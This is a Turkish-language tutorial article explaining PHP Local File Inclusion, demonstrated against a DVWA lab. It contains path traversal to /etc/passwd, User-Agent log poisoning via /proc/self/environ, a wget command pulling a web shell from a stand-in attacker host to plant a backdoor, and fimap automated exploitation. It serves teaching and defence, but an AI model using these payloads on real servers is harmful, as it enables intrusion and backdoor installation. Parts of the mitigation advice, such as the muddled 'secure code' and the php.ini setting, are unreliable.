ÇözümPark'a hoş geldiniz. Oturum Aç | Üye Ol
 
Ana Sayfa Makale Video Forum Resimler Dosyalar Etkinlik Hizmetlerimiz Biz Kimiz

Güvenlik

Local File Inclusion - LFI

File Inclusion, PHP web yazılım dilinde karşılaşılan bir güvenlik açığıdır ve kısaca, dosya ekleme olarak tabir edilebilen bir zayıflıktır. Kötü niyetli saldırganın, yerel (local) ve uzaktan (remote) kod çalıştırmasına olanak sağlar.

 

Local File Inclusion (LFI) : Yerelden dosya ekleyerek kod çalıştırmaktır.

Remote File Inclusion (RFI) : Uzaktan dosya ekleyerek kod çalıştırmaktır.

 

Bu makalede LFI zafiyeti ele alınmıştır.

 

PHP web programlama dili ile kodlanmış uygulamalarda, yazılımcıların tanımladıkları değişkene değer atamaması veya atanan değerlerin filtrelenmemesinden kaynaklanmaktadır.

LFI'ı en tehlikeli yapan noktası ise RCE (Remote Code Execution) zafiyetine dönüşmesidir.

 

LFI zafiyeti içeren örnek bir index.php dosyasının içeriğini inceleyelim:

 

<?php

include($_GET['sayfa'])

?>

 

Bu kodu kullanan bir web sitesinde, anlaşılan site içerisinde aşağıdaki şekilde bağlantı istekleri oluşturulacaktır:

 

http://site.com/index.php?sayfa=haberler.php

http://site.com/index.php?sayfa=iletisim.php

 

En basit görünümüyle böyle bir uygulama, LFI zafiyeti içerir. Nasıl mı?

 

Dışarıdan bakan bir saldırgan gözüyle, *nix sistemlerde kullanıcı adı ve şifrelerin tutulduğu "/etc/passwd" dosyasına erişmeye çalışalım:

 

http://site.com/index.php?sayfa=../../../../../../../../../etc/passwd

 

İsteğin çıktısı:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

...

 

şeklinde olacaktır.

 

URL'deki  "../" ifadesi bulunduğu dizinden bir üst dizine çıkmamızı sağladı ve sunucudaki /etc/passwd dosyasının içeriğini ekrana yazdırmış olduk.

 

Saldırgan, LFI zafiyetini keşfetmiş oldu. Ancak, tabi ki bu kadarıyla yetinmeyecektir.

 

Sunucu tarafında Apache, ziyaretçinin IP adresi, web browser gibi bilgilerini tuttuğu /proc/self/environ dosyası bize bu konuda yardımcı olacaktır.

clip_image002

 

 

Şimdi ise bize ışık tutacak bir işleme geçiyoruz. Web browser'ımızın user-agent kısmına <?php phpinfo(); ?> kodunu enjekte edelim bakalım bunu çözümleyip ekrana yansıtacak mı?

Bunun için ben Mozilla Firefox'un Tamper Data eklentisini kullandım, bu işlemi yapabilecek Burp Suite gibi başka proxy yazılımları da kullanabilirsiniz.

 

 

 

clip_image004

 

Tamper Data açıkken

 

http://192.168.52.132/dvwa/vulnerabilities/fi/?page=/proc/self/environ isteği yaptığımda çıkan uyarıdaki Tamper butonuna basıp HTTP isteğinde çeşitli değişiklikler yapabilir hale geliyoruz.

 

clip_image006

 

 

User-agent değişikliğini yaptıktan sonra aşağıda görüldüğü gibi sistemde yüklü olan PHP ile ilgili konfigürasyon detaylarını görmüş olduk.

 

clip_image008

 

Bu demek oluyor ki kod enjeksiyonu yani RCE başarıyla gerçekleşti. Artık bundan sonra buraya enjekte edeceğimiz asıl kod, "phpinfo()" fonksiyonu gibi masum olmayacak...

 

Bu sefer user-agent kısmına aşağıdaki kodu yazıyoruz:

 

<?system('wget http://zararlisite.com/shell.txt -O shell.php');?>

 

Not: Bu kod ile bize ait olan bir sunucuya *.txt formatında yüklediğimiz ama içinde PHP kodları olan bir web shell'i çağırıp ismini backdoor.php ile bulunduğu dizine kaydettirme işlemi yaptırıyoruz.

clip_image010

 

Evet, aşağıdaki gibi bir çıktı aldık.

clip_image012

 

Şimdi de bulunduğumuz dizinde backdoor.php dosyası oluşmuş mu, ona bakalım...

 

 

clip_image014

 

Evet, görüldüğü üzere backdoor.php dosyamız gelmiş.

 

LFI zafiyetini Apache'deki /proc/self/environ dosyasını exploit (istismar) ederek RCE ile sisteme backdoor yerleştirmiş olduk. LFI zafiyetinin exploit edilmesi sadece bu yöntemle sınırlı değildir, bunun için birkaç farklı yöntem daha vardır ancak en yaygın ve etkin olarak kullanılanı bu bahsettiğimiz yöntemdir.

 

Korunma Yöntemleri:

 

1) Kodu Revize Etme

Zayıf Kod:

<?php

include($ornek. '../index.php');

?>

 

Güvenli Kod:

<?php

$ornek = 'veri';

include($ornek. '../index.php');

?>

 

"ornek" değişkenine tanımlama yaptığımızdan böylece dış verinin girişine izin vermeyeceğiz ve LFI & RFI zafiyeti oluşmamış olacaktır.

 

2) php.ini

/etc/php.ini dosyasının içini açarak disable_function değerinin yanına aşağıda belirtilen özellikleri yazarak web shell scriptlerinin çalışma fonksiyonlarının etkisiz kalmaları sağlanabilir:

disable_function = system, passthru, exec, popen, proc_close, proc_get_status, proc_nice, proc_open, allow_url_fopen, shell, shellexec, executeservice

 

LFI zafiyetini manuel bir şekilde exploit ettik, bu işi otomatik yapan bir yazılım yok mu? O da var... Bunun için Kali Linux'ta halihazırda yüklü olan Fimap'i kullanacağız.

 

LFI zafiyetinin olduğunu bildiğimiz veya şüphelendiğimiz URL'yi Fimap'e taraması için veriyoruz.

 

# fimap --cookie 'security=low; PHPSESSID=0c069f6ac0fc63276a6174a9aff22b9e' -u 'http://192.168.52.132/dvwa/vulnerabilities/fi/?page=include.php'

 

clip_image016

 

clip_image018

 

Not: Bizim hedef sistemimize kullanıcı girişiyle ulaşıldığından dolayı --cookie parametresi kullandık. Eğer sizin hedef sisteminizde taranacak URL'ye kullanıcı girişi yapılmadan ulaşılabiliyorsa --cookie parametresi kullanmadan işlemi gerçekleştirebilirsiniz.

 

Son olarak

 

# fimap -x

 

komutunu veriyoruz.

 

Bize exploit edeceği domaini soruyor. Fimap'e şu an için bir tane tarattığımız için sadece 192.168.52.132 görünmekte, biz de onu seçiyoruz.

Bu hedef sistem için hangi metodu kullanacağımız sorulmakta, 1 diyoruz.

Sisteme hangi web shell'i yüklemek istediğimizi soruyor bunun için de 1 diyoruz.

Vee Fimap, web shell'i sisteme enjekte ederek bize komut satırı getirdi.

 

clip_image020

 

Bir sonraki güvenlik makalemizde görüşmek üzere….

Tarih : 07 Mayıs 2017 Pazar 23:24 Yayınlayan: Gökhan YÜCELER

Yorumlar

Henuz Yorum Yok
Kimliksiz yorumlar seçilemez kılınmış durumdadır.

Yazar: Gökhan YÜCELER

15.01.1986 yılında İstanbulda doğan Gökhan YÜCELER, 11 yıldır IT sektöründe değişik görevlerde çalışmış olup, son 6 yıldır bilişim güvenliği alanına yoğunlaşmış bulunmaktadır. Görev aldığı kuruluşlarda network ve güvenlik uzmanı olarak yer almış olup, bu alanda bir çok projeye imza atmıştır. MayaSoft Bünyesinde, Information Security Specialist olarak kariyerine devam eden Gökhan YÜCELER, güvenlik sızma testleri, adli bilişim incelemeleri, IPS/IDS atlatma teknikleri, DDoS saldırıları tespit ve önleme yöntemleri ve Python Security Scripting üzerine çalışmalar yapmaktadır. Gökhan YÜCELER, MCP, CCNA, CCNP, SNAF, FCNSA, FCNSP, CEH, GPEN sertifikalarına sahiptir.
 

Bu Kategori

Hızlı aktarma

Etiketler